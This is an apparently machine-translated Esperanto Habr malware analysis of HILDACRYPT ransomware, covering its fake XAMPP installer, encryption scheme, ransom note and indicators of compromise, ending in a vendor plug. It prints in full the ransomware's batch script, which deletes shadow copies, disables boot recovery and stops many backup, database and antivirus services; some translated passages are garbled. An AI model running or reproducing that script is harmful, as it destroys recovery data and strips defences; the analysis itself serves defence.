Saluton, Habr! Denove ni parolas pri la plej novaj versioj de malware el la kategorio Ransomware. HILDACRYPT estas nova ransomware, membro de la familio Hilda malkovrita en aŭgusto 2019, nomita laŭ la bildstrio de Netflix, kiu estis uzata por distribui la programaron. Hodiaŭ ni konatiĝas kun la teknikaj trajtoj de ĉi tiu ĝisdatigita ransomware viruso.
En la unua versio de Hilda ransomware, ligo al unu afiŝita sur Youtube bildstriserio estis enhavita en la elaĉeta letero. HILDACRYPT maskas kiel legitima XAMPP-instalilo, facile instalebla Apache-distribuo, kiu inkluzivas MariaDB, PHP kaj Perl. Samtempe, la kriptoŝlosilo havas malsaman dosiernomon - xamp. Krome, la ransomware-dosiero ne havas elektronikan subskribon.
Statika Analizo
La ransomware estas enhavita en PE32 .NET dosiero skribita por MS Windows. Ĝia grandeco estas 135 168 bajtoj. Kaj la ĉefa programkodo kaj la defendanta programkodo estas skribitaj en C#. Laŭ la kompildato kaj tempomarko, la binaro estis kreita la 14-an de septembro 2019.
Laŭ Detect It Easy, la ransomware estas arkivita uzante Confuser kaj ConfuserEx, sed ĉi tiuj malklarigadoj estas la samaj kiel antaŭe, nur ConfuserEx estas la posteulo de Confuser, do iliaj kodaj subskriboj estas similaj.
HILDACRYPT ja estas pakita kun ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Vektoro de atako
Plej verŝajne, la ransomware estis malkovrita sur unu el la retejoj pri programado, maskante kiel legitima XAMPP-programo.
La tuta ĉeno de infekto videblas en .
Malklariĝo
La ransomware-ŝnuroj estas konservitaj en ĉifrita formo. Kiam estas lanĉita, HILDACRYPT deĉifras ilin uzante Base64 kaj AES-256-CBC.
fikso
Antaŭ ĉio, la ransomware kreas dosierujon en %AppDataRoaming%, en kiu la parametro GUID (Tutmonde Unika Identigilo) estas hazarde generita. Aldonante bat-dosieron al ĉi tiu loko, la ransomware-viruso lanĉas ĝin per cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & eliro
Ĝi tiam komencas ekzekuti batan skripton por malŝalti sistemajn funkciojn aŭ servojn.
La skripto enhavas longan liston de komandoj, kiuj detruas ombrajn kopiojn, malŝaltas la SQL-servilon, rezervajn kaj antivirusajn solvojn.
Ekzemple, ĝi provas malsukcese ĉesigi la servojn de Acronis Backup. Krome, ĝi atakas rezervajn sistemojn kaj kontraŭvirusajn solvojn de la sekvaj vendistoj: Veeam, Sophos, Kaspersky, McAfee kaj aliaj.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Post kiam la servoj kaj procezoj menciitaj supre estas malŝaltitaj, la kriptoŝlosilo kolektas informojn pri ĉiuj kurantaj procezoj uzante la tasklist-komandon por certigi, ke ĉiuj necesaj servoj estas malfunkciaj.
taskolisto v/fo csv
Ĉi tiu komando montras detalan liston de kurantaj procezoj, kies elementoj estas apartigitaj per la signo ",".
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Post ĉi tiu kontrolo, la ransomware komencas la ĉifradan procezon.
Ĉifrado
Dosiera ĉifrado
HILDACRYPT ekzamenas ĉiujn trovitajn enhavojn de malmolaj diskoj, krom la dosierujoj Recycle.Bin kaj Reference AssembliesMicrosoft. Ĉi-lasta enhavas kritikajn dosierojn dll, pdb, ktp por .Net-aplikoj, kiuj povas influi la funkciadon de la ransomware. Por serĉi dosierojn kiuj estos ĉifritaj, la sekva listo de etendaĵoj estas uzata:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
La ransomware uzas la AES-256-CBC-algoritmon por ĉifri uzantdosierojn. La ŝlosilgrandeco estas 256 bitoj kaj la inicialigvektoro (IV) grandeco estas 16 bajtoj.
En la sekva ekrankopio, la valoroj de byte_2 kaj byte_1 estis akiritaj hazarde uzante GetBytes ().
Ключ
EN KAJ
La ĉifrita dosiero havas la etendon HCY!.. Ĉi tio estas ekzemplo de ĉifrita dosiero. La ŝlosilo kaj IV supre menciitaj estis kreitaj por ĉi tiu dosiero.
Ŝlosila ĉifrado
La kriptoŝlosilo stokas la generitan AES-ŝlosilon en ĉifrita dosiero. La unua parto de la ĉifrita dosiero havas kaplinion kiu enhavas datumojn kiel HILDACRYPT, KEY, IV, FileLen en XML-formato, kaj aspektas jene:
AES kaj IV-ŝlosila ĉifrado estas farita per RSA-2048, kaj kodado estas farita per Base64. La publika ŝlosilo RSA estas konservita en la korpo de la kriptoŝlosilo en unu el la ĉifritaj ŝnuroj en XML-formato.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
RSA publika ŝlosilo estas uzata por ĉifri la AES-dosierŝlosilon. La publika ŝlosilo RSA estas kodita Base64 kaj konsistas el modulo kaj publika eksponento de 65537. Malĉifrado postulas la privatan ŝlosilon RSA, kiun la atakanto havas.
Post RSA-ĉifrado, la AES-ŝlosilo estas ĉifrita uzante Base64 stokita en la ĉifrita dosiero.
Elaĉeta mesaĝo
Post kiam ĉifrado estas kompleta, HILDACRYPT skribas la html-dosieron al la dosierujo en kiu ĝi ĉifris la dosierojn. La sciigo pri ransomware enhavas du retadresojn, kie la viktimo povas kontakti la atakanton.
La ĉantaĝa avizo enhavas ankaŭ la linion "Neniu loli estas sekura;)" - referenco al animeaj kaj mangaaj roluloj kun aspekto de knabinetoj malpermesitaj en Japanio.
konkludo
HILDACRYPT, nova familio de ransomware, publikigis novan version. La ĉiframodelo malhelpas la viktimon deĉifri dosierojn ĉifritajn de la ransomware. Cryptolocker uzas aktivajn protektajn metodojn por malŝalti protektoservojn rilatajn al rezervaj sistemoj kaj kontraŭvirusaj solvoj. La aŭtoro de HILDACRYPT estas ŝatanto de la vigla serio Hilda montrita sur Netflix, kies ligo al la antaŭfilmo estis enhavita en la elaĉeta letero por la antaŭa versio de la programo.
Kiel kutime, и povas protekti vian komputilon kontraŭ HILDACRYPT ransomware, kaj provizantoj havas la kapablon protekti siajn klientojn per . Protekto estas certigita de la fakto, ke ĉi tiuj solvoj inkluzivas inkluzivas ne nur sekurkopion, sed ankaŭ nian integran sekurecan sistemon - Funkciigita de maŝinlernada modelo kaj bazita sur kondutismaj heŭristiko, teknologio kiu kapablas kontraŭstari la minacon de nulaga ransomware kiel neniu alia.
Indikiloj de kompromiso
Dosiera etendo HCY!
HILDACRYPTReadMe.html
xamp.exe kun unu litero "p" kaj neniu cifereca subskribo
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
fonto: www.habr.com